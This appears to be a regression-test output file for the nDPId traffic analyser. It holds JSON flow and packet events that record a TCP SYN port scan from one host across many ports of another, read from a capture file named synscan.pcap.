+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"synscan.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAsXxUAACgGwV2sEAAIQA2GNIzSFTfdUoMYAAAAAGACBAAfWAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":264,"source":"synscan.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"synscan.pcap","alias":"nDPId-test","flow_id":258,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAsT44AACYG0uSsEAAIQA2GNIzSH23dUoMYAAAAAGACDAANIgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":265,"source":"synscan.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6788,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"synscan.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAsSeUAADYGyI2sEAAIQA2GNIzSGoTdUoMYAAAAAGACDAASCwAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":266,"source":"synscan.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5190,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"synscan.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAsjwoAADUGhGisEAAIQA2GNIzSFEbdUoMYAAAAAGACCAAcSQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":267,"source":"synscan.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1084,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"synscan.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAsZewAADgGqoasEAAIQA2GNIzSBDzdUoMYAAAAAGACBAAwUwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":268,"source":"synscan.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6839,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"synscan.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAsY04AADoGqySsEAAIQA2GNIzSGrfdUoMYAAAAAGACDAAR2AAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":269,"source":"synscan.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":40911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":269,"source":"synscan.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAsyRwAAC0GUlasEAAIQA2GNIzSn8\/dUoMYAAAAAGACCACQvwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":270,"source":"synscan.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":270,"source":"synscan.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAs5EIAACoGOjCsEAAIQA2GNIzSJcLdUoMYAAAAAGACDAAGzQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":271,"source":"synscan.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1123,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":271,"source":"synscan.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAsSRoAAC0G0lisEAAIQA2GNIzSBGPdUoMYAAAAAGACCAAsLAAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":272,"source":"synscan.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"synscan.pcap","alias":"nDPId-test","flow_id":266,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAs2foAAC8GP3isEAAIQA2GNIzSGPXdUoMYAAAAAGACEAAPmgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":273,"source":"synscan.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2525,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"synscan.pcap","alias":"nDPId-test","flow_id":267,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAs4dYAADUGMZysEAAIQA2GNIzSCd3dUoMYAAAAAGACCAAmsgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":274,"source":"synscan.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"synscan.pcap","alias":"nDPId-test","flow_id":268,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAsjcYAADgGgqysEAAIQA2GNIzSG1jdUoMYAAAAAGACBAAZNwAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":275,"source":"synscan.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1840,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":275,"source":"synscan.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAsIAwAADIG9masEAAIQA2GNIzSBzDdUoMYAAAAAGACDAAlXwAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":276,"source":"synscan.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":280,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":276,"source":"synscan.pcap","alias":"nDPId-test","flow_id":270,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAsp2EAADgGaRGsEAAIQA2GNIzSARjdUoMYAAAAAGACBAAzdwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":277,"source":"synscan.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1131,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":277,"source":"synscan.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAskiYAACoGjEysEAAIQA2GNIzSBGvdUoMYAAAAAGACDAAoJAAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":278,"source":"synscan.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"synscan.pcap","alias":"nDPId-test","flow_id":272,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAshE8AADYGjiOsEAAIQA2GNIzSJxLdUoMYAAAAAGACDAAFfQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":279,"source":"synscan.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":279,"source":"synscan.pcap","alias":"nDPId-test","flow_id":273,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAsrUYAADkGYiysEAAIQA2GNIzSC8ndUoMYAAAAAGACCAAkxgAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":280,"source":"synscan.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":700,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":280,"source":"synscan.pcap","alias":"nDPId-test","flow_id":274,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAsgTgAADcGkDqsEAAIQA2GNIzSArzdUoMYAAAAAGACEAAl0wAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":281,"source":"synscan.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058531,"flow_last_seen":1278275058531,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058531,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":281,"source":"synscan.pcap","alias":"nDPId-test","flow_id":275,"flow_packet_id":1,"flow_last_seen":1278275058531,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058531,"pkt":"ACYLMQczACWzv5HuCABFAAAs5cUAADMGL62sEAAIQA2GNIzSFXzdUoMYAAAAAGACEAATEwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":282,"source":"synscan.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058531,"flow_last_seen":1278275058531,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058531,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32781,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"synscan.pcap","alias":"nDPId-test","flow_id":276,"flow_packet_id":1,"flow_last_seen":1278275058531,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058531,"pkt":"ACYLMQczACWzv5HuCABFAAAshYIAADMGj\/CsEAAIQA2GNIzSgA3dUoMYAAAAAGACEACogQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":283,"source":"synscan.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1084,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":283,"source":"synscan.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAsj7IAADkGf8CsEAAIQA2GNIzTBDzdU4MZAAAAAGACCAAsUAAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":284,"source":"synscan.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5190,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"synscan.pcap","alias":"nDPId-test","flow_id":278,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAsoJUAACkGft2sEAAIQA2GNIzTFEbdU4MZAAAAAGACCAAcRgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":285,"source":"synscan.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6788,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":285,"source":"synscan.pcap","alias":"nDPId-test","flow_id":279,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAscMAAAC8GqLKsEAAIQA2GNIzTGoTdU4MZAAAAAGACEAAOCAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":286,"source":"synscan.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"synscan.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAsna4AAC0GfcSsEAAIQA2GNIzTH23dU4MZAAAAAGACCAARHwAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":287,"source":"synscan.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5431,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"synscan.pcap","alias":"nDPId-test","flow_id":281,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAsUPgAADsGvHqsEAAIQA2GNIzTFTfdU4MZAAAAAGACEAATVQAAAgQFtA=="} 